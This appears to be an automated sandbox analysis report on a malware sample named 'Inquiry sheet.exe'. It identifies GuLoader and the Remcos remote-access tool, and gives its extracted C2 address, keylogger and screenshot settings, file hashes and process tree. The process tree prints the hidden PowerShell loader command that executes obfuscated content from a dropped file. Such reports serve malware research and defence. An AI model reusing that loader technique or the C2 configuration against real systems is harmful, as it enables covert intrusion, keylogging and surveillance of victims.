Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    12-09-2024 06:52

General

  • Target

    Inquiry sheet.exe

  • Size

    735KB

  • MD5

    aefec84b0cf65067ab3252ffa4138be9

  • SHA1

    8428b6535d5f0ffd40a11caa713a7b1b053b5fd4

  • SHA256

    dfa4504070e1c32a693e9f6d89dc381e114efb66e450bb2ebcd4594fa06d1568

  • SHA512

    01485b43db4f1dc13f94ae3969d1e0e38e16c0fdb94a76e7d3d8241a411f9cc0dd2f9c85f8f84b159d3b0849059e693e9a84a76b32cf58bbd5a323dd0fa63810

  • SSDEEP

    12288:WnPdCpJPjzlM9caF8tZoP78pNNVyUX+9dc9a:qPdUJPFM9c5tZvpNmUuZ

Malware Config

Extracted

Family

remcos

Botnet

RemcoHost

C2

91.92.255.64:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-5MDDGY

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Inquiry sheet.exe
    "C:\Users\Admin\AppData\Local\Temp\Inquiry sheet.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2844
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Ejendomsfllesskabets=Get-Content 'C:\Users\Admin\AppData\Local\Calvarias\Fitcher\Unquiet.Hal128';$Dictatorially=$Ejendomsfllesskabets.SubString(56305,3);.$Dictatorially($Ejendomsfllesskabets) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Program Files (x86)\windows mail\wabmig.exe
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:2544

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Calvarias\Fitcher\Iscenesttere104.Gen

    Filesize

    309KB

    MD5

    46d1a28bea1c1554e0c438c108535e52

    SHA1

    2af80cb5c8ad0e41747622e8aa488f1efa8df1c2

    SHA256

    cd4f64e9aa391fa018ba036f9b3c342d531edcdd35afb5cd99f7ab2d7756d107

    SHA512

    c032f5fddadbcb780b2210696970495303f3339b45a3800181cee2bf898590fbe09463bc7a1b22a021f19d282a95d2825c322dbb7429a96c2e58d34dd8f2cf5c

  • C:\Users\Admin\AppData\Local\Calvarias\Fitcher\Unquiet.Hal128

    Filesize

    54KB

    MD5

    9a8fdf6c83c9dcbe02443ba384f1b0c4

    SHA1

    ce9c361af6f76016e05fdae18145cad0106e9305

    SHA256

    a1b131759b1b13bcfdb8b13a3d8e3b35e992c3f23e6be78cd00b0f9703747c7c

    SHA512

    c174bf5f949d0d4ca140b1a411bfbecdb0429947ae4280f105fe49bb11bdd461c92830a84dde4a67fa6331d2a7b0a14ccba5f32e2b10efd76c78c91e9b42f6f2

  • memory/2544-31-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-33-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-21-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-37-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-23-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-35-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-34-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-30-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-32-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-20-0x00000000012D0000-0x000000000552C000-memory.dmp

    Filesize

    66.4MB

  • memory/2544-38-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-36-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-29-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-28-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2544-27-0x0000000000260000-0x00000000012C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2840-17-0x0000000073F00000-0x00000000744AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-8-0x0000000073F01000-0x0000000073F02000-memory.dmp

    Filesize

    4KB

  • memory/2840-19-0x0000000073F00000-0x00000000744AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-18-0x0000000006600000-0x000000000A85C000-memory.dmp

    Filesize

    66.4MB

  • memory/2840-11-0x0000000073F00000-0x00000000744AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-10-0x0000000073F00000-0x00000000744AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-15-0x0000000073F00000-0x00000000744AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-12-0x0000000073F00000-0x00000000744AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2840-9-0x0000000073F00000-0x00000000744AB000-memory.dmp

    Filesize

    5.7MB